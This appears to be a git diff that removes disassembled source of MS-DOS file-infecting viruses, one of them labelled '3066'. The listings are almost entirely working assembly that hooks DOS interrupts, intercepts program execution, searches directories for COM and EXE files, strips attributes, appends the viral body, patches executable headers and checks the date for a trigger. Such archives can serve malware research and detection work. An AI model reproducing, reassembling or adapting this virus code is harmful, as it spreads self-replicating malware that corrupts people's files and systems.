ds - pop di - pop si -loc_37: - pushf ; Push flags - shr byte ptr [bp+6],1 ; Shift w/zeros fill - popf ; Pop flags - rcl byte ptr [bp+6],1 ; Rotate thru carry - pop bp - iret ; Interrupt return -loc_38: - call sub_2 ; (042F) - jc loc_37 ; Jump if carry Set - push ax - mov ah,51h ; 'Q' - int 21h ; DOS Services ah=function 51h - ; get active PSP segment in bx - mov ds,bx - mov es,bx - pop ax - cli ; Disable interrupts - mov sp,cs:data_41 ; (8344:08E2=0) - mov ss,cs:data_42 ; (8344:08E4=0) - inc sp - inc sp - sti ; Enable interrupts - jmp dword ptr cs:data_43 ; (8344:08E6=0) - -; -; SUBROUTINE -; - -sub_2 proc near - call sub_24 ; (0884) - stc ; Set carry flag - call sub_4 ; (051A) -loc_39: - mov ax,0Bh - jc loc_40 ; Jump if carry Set - cld ; Clear direction - pushf ; Push flags - push ds - mov ax,3522h - int 21h ; DOS Services ah=function 35h - ; get intrpt vector al in es:bx - mov cs:data_24,bx ; (8344:08B7=0) - mov word ptr cs:data_24+2,es ; (8344:08B9=8344h) - lds si,dword ptr [bp+0Ah] ; Load 32 bit ptr - push cs - pop es - mov di,offset data_39 ; (8344:08D4=0) - mov bx,di - mov cx,7 - rep movsw ; Rep when cx >0 Mov [si] to es:[di] - pop ds - call sub_16 ; (084C) - push dx - mov ax,4B01h - call sub_23 ; (0879) - pop dx - call sub_17 ; (0851) - jnc loc_42 ; Jump if carry=0 -loc_40: - mov [bp+8],ax -loc_41: - call sub_25 ; (0896) - retn -loc_42: - mov [bp+8],ax - mov ah,51h ; 'Q' - int 21h ; DOS Services ah=function 51h - ; get active PSP segment in bx - mov es,bx - mov si,[bp] - lds dx,dword ptr ss:[si+2] ; Load 32 bit ptr - mov es:data_11e,dx ; (08D4:000A=2F9h) - mov es:data_12e,ds ; (08D4:000C=3872h) - mov ax,2522h - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - popf ; Pop flags - jnz loc_41 ; Jump if not zero - push cs - pop ds - mov si,data_51e ; (8344:0904=44h) - mov di,data_13e ; (08D4:0100=0DFh) - mov cx,7ABh - rep movsb ; Rep when cx >0 Mov [si] to es:[di] - call sub_7 ; (0758) - jz loc_44 ; Jump if zero -loc_43: - clc ; Clear carry flag - jmp short loc_41 ; (0470) -loc_44: - mov di,bx - add di,10h - mov ax,ds:data_55e ; (8344:10B1=0) - mov word ptr data_43,ax ; (8344:08E6=0) - mov ax,ds:data_56e ; (8344:10B3=0) - add ax,di - mov word ptr data_43+2,ax ; (8344:08E8=0) - mov cx,ds:data_54e ; (8344:10AF=0) - or cx,cx ; Zero ? - jz loc_43 ; Jump if zero - lds dx,dword ptr [bp+0Eh] ; Load 32 bit ptr - call sub_18 ; (0862) - jc loc_47 ; Jump if carry Set - mov bx,ax - push cx - push cs - pop ds - xor cx,cx ; Zero register - mov dx,ds:data_50e ; (8344:0902=0) - call sub_20 ; (086B) - mov dx,904h - pop cx - -locloop_45: - push cx - mov cx,4 - call sub_8 ; (0764) - pop cx - jc loc_46 ; Jump if carry Set - mov si,dx - push ds - mov ax,[si+2] - mov si,[si] - add ax,di - mov ds,ax - add [si],di - pop ds - loop locloop_45 ; Loop if cx > 0 - - call sub_19 ; (0867) - jmp short loc_43 ; (04A8) -loc_46: - call sub_19 ; (0867) -loc_47: - push es - pop ds - les bx,dword ptr cs:data_24 ; (8344:08B7=0) Load 32 bit ptr - mov ds:data_17e,bx ; (8344:000A=0) - mov ds:data_18e,es ; (8344:000E=8344h) - call sub_13 ; (07EC) - stc ; Set carry flag - jmp loc_39 ; (0436) -sub_2 endp - - -; -; SUBROUTINE -; - -sub_3 proc near - clc ; Clear carry flag - -; External Entry into Subroutine - -sub_4: - push ax - push bx - pushf ; Push flags - call sub_18 ; (0862) - jc loc_48 ; Jump if carry Set - mov bx,ax - popf ; Pop flags - pushf ; Push flags - call sub_6 ; (0533) - pushf ; Push flags - call sub_19 ; (0867) - popf ; Pop flags -loc_48: - pop bx - pop bx - pop ax - retn -sub_3 endp - - -; -; SUBROUTINE -; - -sub_5 proc near - clc ; Clear carry flag - -; External Entry into Subroutine - -sub_6: - cld ; Clear direction - call sub_24 ; (0884) - pushf ; Push flags - push bx - mov ax,1220h - int 2Fh ; ??INT Non-standard interrupt. - jc loc_49 ; Jump if carry Set - xor bh,bh ; Zero register - mov bl,es:[di] - mov ax,1216h - int 2Fh ; ??INT Non-standard interrupt. - jnc loc_50 ; Jump if carry=0 -loc_49: - call sub_25 ; (0896) - retn -loc_50: - push es - push cs - pop ds - mov ax,3523h - int 21h ; DOS Services ah=function 35h - ; get intrpt vector al in es:bx - mov data_26,bx ; (8344:08BB=0) - mov word ptr data_26+2,es ; (8344:08BD=8344h) - inc ax - int 21h ; DOS Services ah=function 35h - ; get intrpt vector al in es:bx - mov data_28,bx ; (8344:08BF=0) - mov word ptr data_28+2,es ; (8344:08C1=8344h) - mov ah,25h ; '%' - mov dx,offset int_24h_entry - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - dec ax - inc dx - inc dx - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - pop es - pop bx - mov al,2 - xchg al,es:[di+2] - mov data_33,al ; (8344:08C9=0) - mov ax,es:[di+5] - mov data_34,ax ; (8344:08CA=0) - mov ax,es:[di+15h] - mov data_37,ax ; (8344:08D0=0) - mov ax,es:[di+17h] - mov data_38,ax ; (8344:08D2=0) - mov ax,es:[di+11h] - mov dx,es:[di+13h] - mov data_35,ax ; (8344:08CC=0) - mov data_36,dx ; (8344:08CE=0) - cmp ax,1Ah - sbb dx,0 - jc loc_55 ; Jump if carry Set - popf ; Pop flags - jc loc_52 ; Jump if carry Set - mov ax,es:[di+28h] - cmp ax,5845h - je loc_51 ; Jump if equal - cmp ax,4F43h - jne loc_55 ; Jump if not equal - mov al,4Dh ; 'M' -loc_51: - cmp al,es:[di+2Ah] - jne loc_55 ; Jump if not equal -loc_52: - xor cx,cx ; Zero register - xor dx,dx ; Zero register - call sub_20 ; (086B) - mov dx,8EAh - mov cl,1Ah - call sub_8 ; (0764) - jc loc_57 ; Jump if carry Set - xor cx,cx ; Zero register - xor dx,dx ; Zero register - call sub_7 ; (0758) - jnz loc_53 ; Jump if not zero - mov ax,data_47 ; (8344:08F2=0) - mov dl,10h - mul dx ; dx:ax = reg * ax - mov cx,dx - mov dx,ax -loc_53: - push cx - push dx - add dx,7ABh - adc cx,0 - cmp cx,data_36 ; (8344:08CE=0) - jne loc_54 ; Jump if not equal - cmp dx,data_35 ; (8344:08CC=0) -loc_54: - pop dx - pop cx - jbe loc_56 ; Jump if below or = -loc_55: - jmp short loc_62 ; (065D) -loc_56: - push cx - push dx - call sub_20 ; (086B) - mov dx,904h - mov cx,7ABh - call sub_8 ; (0764) - jnc loc_58 ; Jump if carry=0 -loc_57: - jmp short loc_60 ; (0656) -loc_58: - push es - push di - push cs - pop es - mov si,data_53e ; (8344:09EF=0) - mov di,offset ds:[1EBh] ; (8344:01EB=1Eh) - mov cx,0C3h - repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di] - pop di - pop es - jnz loc_65 ; Jump if not zero - mov dx,cx - call sub_21 ; (0870) - mov cx,7ADh - mov dx,904h - call sub_7 ; (0758) - jnz loc_59 ; Jump if not zero - add cx,6 -loc_59: - add es:[di+11h],cx - adc word ptr es:[di+13h],0 - call sub_8 ; (0764) - jc loc_60 ; Jump if carry Set - mov si,dx - dec cx - dec cx - call sub_10 ; (0778) - cmp dx,[si] - je loc_61 ; Jump if equal -loc_60: - stc ; Set carry flag - jmp short loc_63 ; (0661) -loc_61: - cmp al,al - jmp short loc_63 ; (0661) -loc_62: - mov al,1 - cmp al,0 -loc_63: - pushf ; Push flags -loc_64: - mov si,offset data_33 ; (8344:08C9=0) - cld ; Clear direction - inc di - inc di - movsb ; Mov [si] to es:[di] - inc di - inc di - movsw ; Mov [si] to es:[di] - add di,0Ah - movsw ; Mov [si] to es:[di] - movsw ; Mov [si] to es:[di] - movsw ; Mov [si] to es:[di] - movsw ; Mov [si] to es:[di] - mov ax,2524h - lds dx,dword ptr data_28 ; (8344:08BF=0) Load 32 bit ptr - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - dec ax - lds dx,dword ptr cs:data_26 ; (8344:08BB=0) Load 32 bit ptr - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - popf ; Pop flags - call sub_25 ; (0896) - retn -loc_65: - test byte ptr es:[di+4],4 - jnz loc_62 ; Jump if not zero - mov ah,0Dh - int 21h ; DOS Services ah=function 0Dh - ; flush disk buffers to disk - push bx - push ds - push es - mov ax,3540h - int 21h ; DOS Services ah=function 35h - ; get intrpt vector al in es:bx - mov data_30,bx ; (8344:08C3=0) - mov word ptr data_30+2,es ; (8344:08C5=8344h) - mov al,13h - int 21h ; DOS Services ah=function 35h - ; get intrpt vector al in es:bx - mov data_22,bx ; (8344:08B3=0) - mov word ptr data_22+2,es ; (8344:08B5=8344h) - mov ah,25h ; '%' - lds dx,data_21 ; (8344:08AF=0) Load 32 bit ptr - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - mov al,40h ; '@' -;* mov dx,offset loc_85 ;* - db 0BAh, 59h,0ECh - mov bx,0F000h - mov ds,bx - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - pop es - pop ds - pop bx - xor cx,cx ; Zero register - xor dx,dx ; Zero register - call sub_21 ; (0870) - mov cx,7ABh - mov si,904h - call sub_7 ; (0758) - jnz loc_66 ; Jump if not zero - add cx,6 - mov ax,data_46 ; (8344:08F0=0) - mov ds:data_54e,ax ; (8344:10AF=0) - mov ax,data_48 ; (8344:08FE=0) - mov ds:data_55e,ax ; (8344:10B1=0) - mov ax,ds:data_49e ; (8344:0900=0) - mov ds:data_56e,ax ; (8344:10B3=0) -loc_66: - push si - call sub_10 ; (0778) - mov [si],dx - pop dx - inc cx - inc cx - call sub_9 ; (076E) - jc loc_68 ; Jump if carry Set - pop dx - pop cx - call sub_20 ; (086B) - mov dx,100h - mov cx,7ABh - call sub_9 ; (076E) - jc loc_69 ; Jump if carry Set - call sub_7 ; (0758) - jnz loc_67 ; Jump if not zero - xor cx,cx ; Zero register - mov data_46,cx ; (8344:08F0=0) - mov data_48,dx ; (8344:08FE=0) - mov word ptr ds:data_49e,0FFF0h ; (8344:0900=0) - xor dx,dx ; Zero register - call sub_20 ; (086B) - mov dx,8EAh - mov cx,1Ah - call sub_9 ; (076E) - jc loc_69 ; Jump if carry Set -loc_67: - cmp al,al - jmp short loc_70 ; (073C) -loc_68: - mov al,1 - cmp al,0 - jmp short loc_70 ; (073C) -loc_69: - stc ; Set carry flag -loc_70: - pushf ; Push flags - mov ah,0Dh - int 21h ; DOS Services ah=function 0Dh - ; flush disk buffers to disk - push ds - mov ax,2513h - lds dx,dword ptr data_22 ; (8344:08B3=0) Load 32 bit ptr - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - mov al,40h ; '@' - lds dx,dword ptr cs:data_30 ; (8344:08C3=0) Load 32 bit ptr - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - pop ds - jmp loc_64 ; (0662) -sub_5 endp - - -; -; SUBROUTINE -; - -sub_7 proc near - mov ax,data_45 ; (8344:08EA=0) - cmp ax,5A4Dh - je loc_ret_71 ; Jump if equal - cmp ax,4D5Ah - -loc_ret_71: - retn -sub_7 endp - - -; -; SUBROUTINE -; - -sub_8 proc near - mov ah,3Fh ; '?' - call sub_23 ; (0879) - jc loc_ret_72 ; Jump if carry Set - cmp ax,cx - -loc_ret_72: - retn -sub_8 endp - - -; -; SUBROUTINE -; - -sub_9 proc near - mov ah,40h ; '@' - call sub_23 ; (0879) - jc loc_ret_73 ; Jump if carry Set - cmp ax,cx - -loc_ret_73: - retn -sub_9 endp - - -; -; SUBROUTINE -; - -sub_10 proc near - push cx - xor dx,dx ; Zero register - -locloop_74: - lodsb ; String [si] to al - add dl,al - adc dh,0 - loop locloop_74 ; Loop if cx > 0 - - pop cx - retn -sub_10 endp - - -; -; SUBROUTINE -; - -sub_11 proc near - push cs - pop ds - mov si,904h - mov bx,ax - mov cx,7ABh - call sub_7 ; (0758) - jnz loc_75 ; Jump if not zero - mov ax,data_47 ; (8344:08F2=0) - mov dx,10h - mul dx ; dx:ax = reg * ax - push bx - push di - call sub_12 ; (07BF) - pop di - pop bx - mov si,offset data_45 ; (8344:08EA=0) - mov cx,1Ah - mov ax,ds:data_54e ; (8344:10AF=0) - mov data_46,ax ; (8344:08F0=0) - mov ax,ds:data_55e ; (8344:10B1=0) - mov data_48,ax ; (8344:08FE=0) - mov ax,ds:data_56e ; (8344:10B3=0) - mov ds:data_49e,ax ; (8344:0900=0) -loc_75: - xor ax,ax ; Zero register - xor dx,dx ; Zero register - -; External Entry into Subroutine - -sub_12: - sub ax,data_37 ; (8344:08D0=0) - sbb dx,data_38 ; (8344:08D2=0) - jc loc_76 ; Jump if carry Set - jnz loc_ret_79 ; Jump if not zero - sub bx,ax - jbe loc_ret_79 ; Jump if below or = - add di,ax - jmp short loc_77 ; (07E2) -loc_76: - neg ax - adc dx,0 - neg dx - jnz loc_ret_79 ; Jump if not zero - sub cx,ax - jbe loc_ret_79 ; Jump if below or = - add si,ax -loc_77: - cmp cx,bx - jbe loc_78 ; Jump if below or = - mov cx,bx -loc_78: - cld ; Clear direction - rep movsb ; Rep when cx >0 Mov [si] to es:[di] - -loc_ret_79: - retn -sub_11 endp - - -; -; SUBROUTINE -; - -sub_13 proc near - pushf ; Push flags - call sub_24 ; (0884) - mov ah,49h ; 'I' - push ds - pop es - int 21h ; DOS Services ah=function 49h - ; release memory block, es=seg - mov ah,49h ; 'I' - mov es,ds:data_8e ; (0046:002C=50h) - int 21h ; DOS Services ah=function 49h - ; release memory block, es=seg - mov ah,50h ; 'P' - mov bx,ds:data_7e ; (0046:0016=0) - int 21h ; DOS Services ah=function 50h - ; set active PSP segmnt from bx - mov ax,2522h - lds dx,dword ptr ds:data_6e ; (0046:000A=0) Load 32 bit ptr - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - call sub_25 ; (0896) - popf ; Pop flags - retn -sub_13 endp - - -; -; SUBROUTINE -; - -sub_14 proc near - mov si,dx - cmp byte ptr [si],0FFh - jne loc_ret_80 ; Jump if not equal - add si,7 - -loc_ret_80: - retn -sub_14 endp - - -; -; SUBROUTINE -; - -sub_15 proc near - call sub_24 ; (0884) - call sub_14 ; (0814) - push cs - pop es - mov dx,904h - mov di,dx - cld ; Clear direction - lodsb ; String [si] to al - or al,al ; Zero ? - jz loc_81 ; Jump if zero - add al,40h ; '@' - mov ah,3Ah ; ':' - stosw ; Store ax to es:[di] -loc_81: - movsw ; Mov [si] to es:[di] - movsw ; Mov [si] to es:[di] - movsw ; Mov [si] to es:[di] - movsw ; Mov [si] to es:[di] - mov al,2Eh ; '.' - stosb ; Store al to es:[di] - movsw ; Mov [si] to es:[di] - movsb ; Mov [si] to es:[di] - xor al,al ; Zero register - stosb ; Store al to es:[di] - push es - pop ds - call sub_3 ; (0519) - call sub_25 ; (0896) - retn -sub_15 endp - - -; -; SUBROUTINE -; - -sub_16 proc near - push ax - mov ax,cs - jmp short loc_82 ; (0854) - -; External Entry into Subroutine - -sub_17: - push ax - xor ax,ax ; Zero register -loc_82: - push bx - push ds - mov bx,cs - dec bx - mov ds,bx - mov ds:data_16e,ax ; (8343:0001=0FFFFh) - pop ds - pop bx - pop ax - retn -sub_16 endp - - -; -; SUBROUTINE -; - -sub_18 proc near - mov ax,3D00h - jmp short loc_83 ; (0879) - -; External Entry into Subroutine - -sub_19: - mov ah,3Eh ; '>' - jmp short loc_83 ; (0879) - -; External Entry into Subroutine - -sub_20: - mov ax,4200h - jmp short loc_83 ; (0879) - -; External Entry into Subroutine - -sub_21: - mov ax,4202h - jmp short loc_83 ; (0879) - -; External Entry into Subroutine - -sub_22: - push word ptr [bp+6] - popf ; Pop flags - -; External Entry into Subroutine - -sub_23: -loc_83: - pushf ; Push flags - cli ; Disable interrupts - call dword ptr cs:data_20 ; (8344:08AB=0) - retn -sub_18 endp - - -; -; -; External Entry Point -; -; - -int_24h_entry proc far - mov al,3 -int_24h_entry endp - - -; -; -; External Entry Point -; -; - -int_23h_entry proc far - iret ; Interrupt return -int_23h_entry endp - - -; -; SUBROUTINE -; - -sub_24 proc near - pop cs:data_32 ; (8344:08C7=0) - push ds - push dx - push es - push bx - push ax - push cx - push si - push di - push bp - mov bp,sp - jmp short loc_84 ; (08A6) - -; External Entry into Subroutine - -sub_25: - pop cs:data_32 ; (8344:08C7=0) - mov sp,bp - pop bp - pop di - pop si - pop cx - pop ax - pop bx - pop es - pop dx - pop ds -loc_84: - jmp word ptr cs:data_32 ; (8344:08C7=0) -data_20 dd 00000h -data_21 dd 00000h -data_22 dw 0, 8344h -data_24 dw 0, 8344h -data_26 dw 0, 8344h -data_28 dw 0, 8344h -data_30 dw 0, 8344h -data_32 dw 0 -data_33 db 0 -data_34 dw 0 -data_35 dw 0 -data_36 dw 0 -data_37 dw 0 -data_38 dw 0 -data_39 dw 0 - db 12 dup (0) -data_41 dw 0 -data_42 dw 0 -data_43 dd 00000h -data_45 dw 0 - db 0, 0, 0, 0 -data_46 dw 0 -data_47 dw 0 - db 10 dup (0) -data_48 dw 0 -sub_24 endp - - -seg_a ends - - - - end start - \ No newline at end of file diff --git a/0-9/3066 (9).ASM b/0-9/3066 (9).ASM deleted file mode 100755 index 70933dc..0000000 --- a/0-9/3066 (9).ASM +++ /dev/null @@ -1,1491 +0,0 @@ - -PAGE 59,132 - -; -; -; 3066 -; -; Created: 19-Mar-89 -; Version: -; Passes: 5 Analysis Options on: QRS -; -; -; - -.286c - -data_1e equ 24h ; (0000:0024=45h) -data_2e equ 26h ; (0000:0026=3D1h) -data_3e equ 70h ; (0000:0070=0FF53h) -data_4e equ 72h ; (0000:0072=0F000h) -data_5e equ 80h ; (0000:0080=1094h) -data_6e equ 82h ; (0000:0082=123h) -data_7e equ 84h ; (0000:0084=109Eh) -data_8e equ 86h ; (0000:0086=123h) -data_9e equ 90h ; (0000:0090=156h) -data_10e equ 92h ; (0000:0092=44Bh) -data_11e equ 9Ch ; (0000:009C=0BCh) -data_13e equ 0B3h ; (0000:00B3=1) -data_14e equ 0C8h ; (0000:00C8=0DAh) -data_15e equ 0D1h ; (0000:00D1=10h) -data_16e equ 0DFh ; (0000:00DF=1) -data_17e equ 0E3h ; (0000:00E3=1) -data_18e equ 0EAh ; (0000:00EA=123h) -data_19e equ 0ECh ; (0000:00EC=10DAh) -data_20e equ 0EEh ; (0000:00EE=23h) -data_21e equ 0F1h ; (0000:00F1=10h) -data_22e equ 151h ; (0000:0151=0EAh) -data_23e equ 153h ; (0000:0153=0A6F0h) -data_24e equ 155h ; (0000:0155=0EAh) -data_25e equ 449h ; (0000:0449=3) -data_26e equ 972h ; (0000:0972=74h) -data_27e equ 80h ; (00AE:0080=0FFh) -data_28e equ 0A0h ; (5E5F:00A0=0FFh) -data_29e equ 0F00h ; (5E5F:0F00=0FFh) -data_30e equ 0FA0h ; (5E5F:0FA0=0FFh) -data_31e equ 0FF60h ; (5E5F:FF60=0FFFFh) -data_32e equ 0E0h ; (683D:00E0=0FFFFh) -data_33e equ 0 ; (6FB8:0000=0) -data_34e equ 4 ; (6FB8:0004=0) -data_35e equ 5 ; (6FB8:0005=0) -data_36e equ 87h ; (6FB8:0087=0) -data_37e equ 0A0h ; (6FB8:00A0=0) -data_38e equ 0DFh ; (6FB8:00DF=0) -data_39e equ 0E0h ; (6FB8:00E0=0) -data_40e equ 0E2h ; (6FB8:00E2=0) -data_41e equ 0E3h ; (6FB8:00E3=0) -data_42e equ 0E4h ; (6FB8:00E4=0) -data_43e equ 0E6h ; (6FB8:00E6=0) -data_44e equ 0E8h ; (6FB8:00E8=0) -data_45e equ 0EAh ; (6FB8:00EA=0) -data_46e equ 0ECh ; (6FB8:00EC=0) -data_47e equ 0EEh ; (6FB8:00EE=0) -data_48e equ 0EFh ; (6FB8:00EF=0) -data_49e equ 0F1h ; (6FB8:00F1=0) -data_50e equ 0F3h ; (6FB8:00F3=0) -data_51e equ 0F5h ; (6FB8:00F5=0) -data_93e equ 100h ; (7188:0100=0) -data_94e equ 0E2h ; (969B:00E2=0) - -seg_a segment byte public - assume cs:seg_a, ds:seg_a - - - org 100h - -3066 proc far - -start: - jmp loc_5 ; (0243) - db 01h,0B4h -data_54 dw 0CD09h ; Data table (indexed access) - ; xref 6FB8:0ADC, 0B5E, 0BA4, 0C67 - ; 0C7B, 0CCB, 0CD4 - db 21h,0B8h, 00h, 4Ch,0CDh, 21h - db 'This program only exists to beco' - - - - - - db 'me infected - COM version', 0Dh, 0Ah - - - - - db '$' - db 8Dh, 16h, 0Dh,0FFh,0FFh, 00h - db 01h, 8Ch -data_56 dw 4D10h ; Data table (indexed access) - ; xref 6FB8:0270, 02DC, 046C -data_57 dw 6FB8h ; Data table (indexed access) - ; xref 6FB8:0276, 02E0, 0470 -data_58 db 0 ; Data table (indexed access) - ; xref 6FB8:0387, 03C8, 0608, 06A4 - db 8Dh, 16h, 0Dh,0FFh,0FFh, 09h - db 0CDh, 21h,0B8h, 00h, 4Ch,0CDh - db '!This program on', 0Dh, 0Ah, '$' - - - - db 27 dup (0) - db 50h, 4Ch, 49h, 43h - db 60 dup (0) - db 01h, 3Fh - db 7 dup (3Fh) - db 43h, 4Fh, 4Dh, 20h, 00h - db 7 dup (0) - db 20h, 96h, 66h,0D7h, 12h, 4Ch - db 00h, 00h, 00h - db 'TSTJ3066.COM' - - db 00h, 00h, 01h, 3Fh - db 10 dup (3Fh) - db 10h, 05h - db 7 dup (0) - db 20h,0E9h, 11h,0B5h, 12h,0F6h - db 48h, 02h, 00h - db 'CAT-TWO.ARC' - - db 00h, 00h, 00h, 00h,0BCh, 0Eh - db 00h, 00h, 20h, 00h, 72h, 49h - db 73h, 12h,0EBh, 04h,0DDh, 0Ch - db 00h, 00h, 00h, 51h, 59h, 8Bh - db 0Fh, 20h, 00h - db 56h, 47h, 31h -loc_5: ; xref 6FB8:0100 - jmp short loc_6 ; (0247) - db 0F5h, 0Bh -loc_6: ; xref 6FB8:0243 - call sub_17 ; (08BB) - call sub_15 ; (0875) - mov ah,19h - int 21h ; DOS Services ah=function 19h - ; get default drive al (0=a:) - mov ds:data_22e[si],si ; (0000:0151=0EAh) - add word ptr ds:data_22e[si],884h ; (0000:0151=0EAh) - mov ds:data_23e[si],cs ; (0000:0153=0A6F0h) - mov ds:data_17e[si],al ; (0000:00E3=1) - call sub_10 ; (076E) - mov dl,ds:data_94e[di] ; (969B:00E2=0) - mov ax,ds - push cs - pop ds - jnz loc_8 ; Jump if not zero - mov data_56[si],984h ; (6FB8:0151=4D10h) - mov data_57[si],ax ; (6FB8:0153=6FB8h) - cmp dl,0FFh - je loc_8 ; Jump if equal - mov ah,0Eh - int 21h ; DOS Services ah=function 0Eh - ; set default drive dl (0=a:) -loc_8: ; xref 6FB8:026E, 027D - mov byte ptr ds:[872h][si],80h ; (6FB8:0872=0FFh) - mov word ptr ds:data_48e[si],0 ; (6FB8:00EF=0) - mov ah,2Ah ; '*' - int 21h ; DOS Services ah=function 2Ah - ; get date, cx=year, dx=mon/day - cmp cx,7C4h - jge loc_9 ; Jump if > or = - jmp short loc_12 ; (02C2) - db 0BDh, 09h,0BCh, 0Eh, 00h -loc_9: ; xref 6FB8:0296 - jg loc_10 ; Jump if > - cmp dh,0Ch - jl loc_12 ; Jump if < - cmp dl,5 - jl loc_12 ; Jump if < - cmp dl,1Ch - jl loc_11 ; Jump if < -loc_10: ; xref 6FB8:029F - mov word ptr ds:[877h][si],0FFDCh ; (6FB8:0877=8EC0h) - mov byte ptr ds:[872h][si],88h ; (6FB8:0872=0FFh) -loc_11: ; xref 6FB8:02AE - cmp byte ptr [si+4],0F8h - nop ;*ASM fixup - displacement - jae loc_13 ; Jump if above or = -loc_12: ; xref 6FB8:0298, 02A4, 02A9, 0356 - mov byte ptr cs:data_47e[si],0 ; (6FB8:00EE=0) - jmp loc_30 ; (0460) - cmp byte ptr [si+4],0F8h - nop ;*ASM fixup - displacement - jae loc_13 ; Jump if above or = - or byte ptr ds:[872h][si],4 ; (6FB8:0872=0FFh) -loc_13: ; xref 6FB8:02C0, 02D0 - mov byte ptr ds:data_38e[si],0 ; (6FB8:00DF=0) - mov dx,data_56[si] ; (6FB8:0151=4D10h) - mov ds,data_57[si] ; (6FB8:0153=6FB8h) - mov ax,4300h - call sub_1 ; (0436) - jc loc_14 ; Jump if carry Set - mov cs:data_51e[si],cx ; (6FB8:00F5=0) - and cl,0FEh - mov ax,4301h - call sub_1 ; (0436) - jc loc_14 ; Jump if carry Set - mov ax,3D02h - int 21h ; DOS Services ah=function 3Dh - ; open file, al=mode,name@ds:dx - jc loc_14 ; Jump if carry Set - push cs - pop ds - mov ds:data_48e[si],ax ; (6FB8:00EF=0) - mov bx,ax - mov ax,5700h - int 21h ; DOS Services ah=function 57h - ; get/set file date & time - mov ds:data_49e[si],cx ; (6FB8:00F1=0) - mov ds:data_50e[si],dx ; (6FB8:00F3=0) - dec byte ptr [si+4] - nop ;*ASM fixup - displacement - mov dx,word ptr ds:[880h][si] ; (6FB8:0880=687h) - mov cx,word ptr ds:[882h][si] ; (6FB8:0882=90h) - add dx,4 - nop ;*ASM fixup - sign extn byte - adc cx,0 - mov ax,4200h - int 21h ; DOS Services ah=function 42h - ; move file ptr, cx,dx=offset -loc_14: ; xref 6FB8:02EA, 02FA, 0301 - push cs - pop ds - test byte ptr ds:[872h][si],4 ; (6FB8:0872=0FFh) - jz loc_15 ; Jump if zero - call sub_3 ; (051F) - jmp loc_30 ; (0460) -loc_15: ; xref 6FB8:0337 - xor dl,dl ; Zero register - mov ah,47h ; 'G' - push si - add si,46h - int 21h ; DOS Services ah=function 47h - ; get present dir,drive dl,1=a: - pop si - cmp byte ptr ds:data_47e[si],0 ; (6FB8:00EE=0) - jne loc_16 ; Jump if not equal - call sub_2 ; (0444) - jnc loc_17 ; Jump if carry=0 -loc_16: ; xref 6FB8:034F - jmp loc_12 ; (02C2) -loc_17: ; xref 6FB8:0354, 0433 - mov dx,si - add dx,data_36e ; (6FB8:0087=0) - mov ah,1Ah - int 21h ; DOS Services ah=function 1Ah - ; set DTA to ds:dx - mov word ptr [si+5],2E2Ah - mov word ptr [si+7],4F43h - mov word ptr [si+9],4Dh - mov ah,4Eh ; 'N' - mov dx,si - add dx,5 -loc_18: ; xref 6FB8:03A7 - mov cx,20h - call sub_1 ; (0436) - jc loc_21 ; Jump if carry Set - mov dx,si - add dx,0A5h - mov data_58[si],0 ; (6FB8:0155=0) - call sub_4 ; (0535) - jc loc_20 ; Jump if carry Set - call sub_3 ; (051F) -loc_19: ; xref 6FB8:039C - jmp loc_29 ; (0454) -loc_20: ; xref 6FB8:038F - cmp byte ptr ds:data_20e[si],0 ; (0000:00EE=23h) - jne loc_19 ; Jump if not equal - cmp byte ptr ds:data_24e[si],0 ; (0000:0155=0EAh) - jne loc_25 ; Jump if not equal - mov ah,4Fh ; 'O' - jmp short loc_18 ; (0379) -loc_21: ; xref 6FB8:037F - mov word ptr [si+7],5845h - mov word ptr [si+9],45h - mov ah,4Eh ; 'N' - mov dx,si - add dx,5 -loc_22: ; xref 6FB8:03E9 - mov cx,20h - call sub_1 ; (0436) - jc loc_25 ; Jump if carry Set - mov dx,si - add dx,0A5h - mov data_58[si],0 ; (6FB8:0155=0) - call sub_4 ; (0535) - jc loc_24 ; Jump if carry Set - call sub_3 ; (051F) -loc_23: ; xref 6FB8:03DE - jmp short loc_29 ; (0454) - db 90h -loc_24: ; xref 6FB8:03D0 - cmp byte ptr cs:data_47e[si],0 ; (6FB8:00EE=0) - jne loc_23 ; Jump if not equal - cmp byte ptr ds:data_24e[si],0 ; (0000:0155=0EAh) - jne loc_25 ; Jump if not equal - mov ah,4Fh ; 'O' - jmp short loc_22 ; (03BA) -loc_25: ; xref 6FB8:03A3, 03C0, 03E5 - call sub_2 ; (0444) - mov dx,si - add dx,data_13e ; (0000:00B3=1) - mov ah,1Ah - int 21h ; DOS Services ah=function 1Ah - ; set DTA to ds:dx -loc_26: ; xref 6FB8:0424 - mov ah,4Fh ; 'O' - mov cx,10h - cmp byte ptr ds:data_16e[si],0 ; (0000:00DF=1) - jne loc_27 ; Jump if not equal - mov byte ptr ds:data_16e[si],1 ; (0000:00DF=1) - mov word ptr [si+5],2E2Ah - mov word ptr [si+7],2Ah - mov ah,4Eh ; 'N' - mov dx,si - add dx,5 -loc_27: ; xref 6FB8:0402 - call sub_1 ; (0436) - jc loc_29 ; Jump if carry Set - test byte ptr ds:data_14e[si],10h ; (0000:00C8=0DAh) - jz loc_26 ; Jump if zero - mov dx,si - add dx,data_15e ; (0000:00D1=10h) - mov ah,3Bh ; ';' - call sub_1 ; (0436) - jc loc_29 ; Jump if carry Set - jmp loc_17 ; (0359) - -3066 endp - -; -; SUBROUTINE -; -; Called from: 6FB8:02E7, 02F7, 037C, 03BD, 041A, 042E, 0450 -; 0571, 0582, 058A -; - -sub_1 proc near - int 21h ; DOS Services ah=function 43h - ; get/set file attrb, nam@ds:dx - jc loc_ret_28 ; Jump if carry Set - test byte ptr cs:data_47e[si],0FFh ; (6FB8:00EE=0) - jz loc_ret_28 ; Jump if zero - stc ; Set carry flag - -loc_ret_28: ; xref 6FB8:0438, 0440 - retn -sub_1 endp - - -; -; SUBROUTINE -; -; Called from: 6FB8:0351, 03EB, 0454 -; - -sub_2 proc near - mov word ptr [si+5],5Ch - mov dx,si 